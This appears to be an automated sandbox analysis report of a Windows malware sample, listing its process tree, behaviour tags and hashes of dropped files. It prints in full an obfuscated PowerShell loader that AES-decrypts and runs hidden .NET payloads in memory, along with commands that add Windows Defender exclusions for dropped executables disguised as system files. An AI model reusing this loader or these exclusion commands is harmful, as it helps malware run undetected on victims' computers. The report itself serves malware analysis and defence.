C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; }}$payloads_var=[string[]]$LRDpi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:620

C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe"
7⤵
- Executes dropped EXE
PID:744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
8⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
9⤵
PID:1476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
9⤵
PID:4064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:3972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
9⤵
PID:4296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
9⤵
PID:4928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
9⤵
PID:1056

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:8
9⤵
PID:3660

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:8
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:2604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
9⤵
PID:1016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
9⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
9⤵
PID:1828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
9⤵
PID:4444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
9⤵
PID:4392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
9⤵
PID:3752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
9⤵
PID:2292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
9⤵
PID:5700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
9⤵
PID:5800

C:\Windows\system32\msdt.exe
-modal "197078" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp" -ep "NetworkDiagnosticsWeb"
9⤵
- Suspicious use of FindShellTrayWindow
PID:5892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
9⤵
PID:1348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
9⤵
PID:6324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
8⤵
PID:3244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
9⤵
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe"
7⤵
- Executes dropped EXE
PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS
1⤵
- Drops file in System32 directory
- Checks processor information in registry
PID:5808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5712

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\winethc.dll",ForceProxyDetectionOnNextRun
2⤵
PID:6180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
1⤵
PID:5720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbcd1a1cfhd411h4ae1h9fe3h3354cdb4a53e
1⤵
PID:6644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
2⤵
PID:6672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
2⤵
PID:6900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
2⤵
PID:6932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3376

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\NetworkDiagnostics.debugreport.xml
Filesize
76KB

MD5
8ccea272ca15f9f95878b4a75e9a6ca9

SHA1
939c71347274667685d2692481eb849547a21424

SHA256
19973d08d57bdf922ff8d95778536c4623e86713585465286c9a643b9207a795

SHA512
3b5680bc929c84a2f88ae2d9b29554abb53d362ac5d16b1f9af4636395ecef4e6b6594426e7484c938678bd6d054d3df40f574ffdb4f120f397c18be7c1db027

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\ResultReport.xml
Filesize
36KB

MD5
129d8019e720103ed877ac6ff04a4297

SHA1
f56ee8aead2c02c6350280c7e33340d186089b03

SHA256
b15c8229e97687c8682a9b8a924f233a1a8994cd41889102e321cf745524800c

SHA512
2a92f706166c4ee5ea1242aee505c1384440f3ad3a6cdd8403efaf245f0b9d63d074b27c4731055bf2201389fefea2d952aceaa6813959a5d52acba85352a34c

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\results.xsl
Filesize
47KB

MD5
310e1da2344ba6ca96666fb639840ea9

SHA1
e8694edf9ee68782aa1de05470b884cc1a0e1ded

SHA256
67401342192babc27e62d4c1e0940409cc3f2bd28f77399e71d245eae8d3f63c

SHA512
62ab361ffea1f0b6ff1cc76c74b8e20c2499d72f3eb0c010d47dba7e6d723f9948dba3397ea26241a1a995cffce2a68cd0aaa1bb8d917dd8f4c8f3729fa6d244

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4158365912175436289496136e7912c2

SHA1
813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

SHA256
354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

SHA512
74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ce4c898f8fc7601e2fbc252fdadb5115

SHA1
01bf06badc5da353e539c7c07527d30dccc55a91

SHA256
bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

SHA512
80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
f50a091b253172037dd77531196b8e6a

SHA1
7b7f973390d1ca3ab838fbadd952031b92cf2f2c

SHA256
518fbb4abc9695517fc23bc4e93b866318f41deef16b265c3d3d11e3a4855225

SHA512
0f650bbaa413b1a4bed72de2420104e9d032e47bd3a06e8a7c9b93d24ff1770d1dd9775d09931410da99e6c77ec5c5f0982dec6fcbd77d4939f413aeee447856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
0b9413c83e56e3c23e204843dce03482

SHA1
56b4bb587536ec43ccf5d1a1dc549a1008890a0c

SHA256
78d3158c6a79639b012ef7851b46489a4c020e971482a7be198ec74e63a9a281

SHA512
350a951d8413d0d654240a85b561087b10c5aa47c8a2351c8dba3ddb9e9ec3b33a1aace1386983fc0f6730a78028ac2482de1c56fd1c5f4bdfc6bf1d7d08df92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
24a1b8cbcd8c68c91c2cdedec7989966

SHA1
2d65b0266699c1ba4f0cc0cb2b3a71c1031b9de0

SHA256
5cafbd0285d32183dc26dd3c6b2cd1abecb2394aeed9343622cabefe8ebdb79c

SHA512
b489719003c6d2956dc4ef7a8355747abbb05900d8e903f5e4c76f98acdf38f3421bc10fe96e2a684830c74d8958004245e2dc61a5a3631786ce4fafc4a202f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
af387375b6efd28eb75029d7643a863c

SHA1
79a190af5a93a43a898016decfdeeca4bc57ae4c

SHA256
e2ae929ad7023da77c2d48274983b0d1ec3dcf9a7aa26f00fc0dbb97a1ed5945

SHA512
2e323be26de02d52af8cda31cfa7356941f6c895edca5790ef26bd51f2716fdcb7fbe1096984854e18e3c3094e08bfecb6a1699e6645e33933a997fe012ed8fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
8KB

MD5
c9041f461132e93f594aef4c22567a01

SHA1
5c6042634ac65fb3e81ff89c47ce2780ff56b476

SHA256
d3ec5c00bd2e9d999fa0264e53c52766614364a48c117bc9853889df6fb2019c

SHA512
c597810c990114fca8d86d985db8e61c8562962cc7f0cd07a88f06aa9748569bce1f8db4ae45feeceef993706d2a13754c18200c774846f2cfaba18bd4eb6ee3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
8KB

MD5
4c2458dd89f8675a223101b66e73c97a

SHA1
d22698525a982c04434316f8824f89f4f8fb3fbb

SHA256
4d427c92c9f59eb3457a94eca1cbbda4846e9751567848f03d0c1ca259e4aa3d

SHA512
44c098fbdff31525948865c4da0de6d067aa655d89eb17cf288f952e6e959697d22119d569d070f08824fd7f036e2613fe082dca7816b826051879edadce7b68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
09de602b16b6d8443257146db2bad1c9

SHA1
5dad021072f29bd13813cd5c4bef698075439b8d

SHA256
74fa124e03d07ca98f9a33aba4728de18e1a8caa0460e07630e0830699406bb1

SHA512
c0866ba064c391584a68bb4ac1884793bd3e2da27203f8476bc760429796acb14f0cbc4ba2dcc50966dcec7968be16bdf3460edd83e784d6b15830e1ae687b6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
8KB

MD5
d84f682c536219c60b20ca215d3e8495

SHA1
fa7626f812b4f5998713ba2aa4aba0b748493818

SHA256
750b2c6291f33326f332f876eadf9ae400a51a0445d294896781391328d6b9fa

SHA512
76d3e0e886a2afd0d634f66130020dd4cf16ddd8becac2807e37e1b6882c72173d31ef215cd5d5256933ed585cfa20e5178c78f50437b2cee3809904b7b71cba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
Filesize
264KB

MD5
7c73d321e34419e94ed77d0fd1b53ea8

SHA1
7597770df1590bfb9b859b6c80a23141b56c4232

SHA256
5afc5732b69b310dc0c16f7f94563fa8c02a9e8ee2bf19365c36d6f3a295b297

SHA512
af8517d5cd91052ba5ab8f3e2bb74a3b057e56dd694fca36850cb225a6e4d59e7c7bdbe16363db046dc2ce071f241a002bb85d3c7d553dfb43b58081eee149ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
71c4b1323b5c2b0b3dce79a418170c57

SHA1
f2484755165cc812bd2017c3ff93d7aef8e9f642

SHA256
b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872

SHA512
9048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
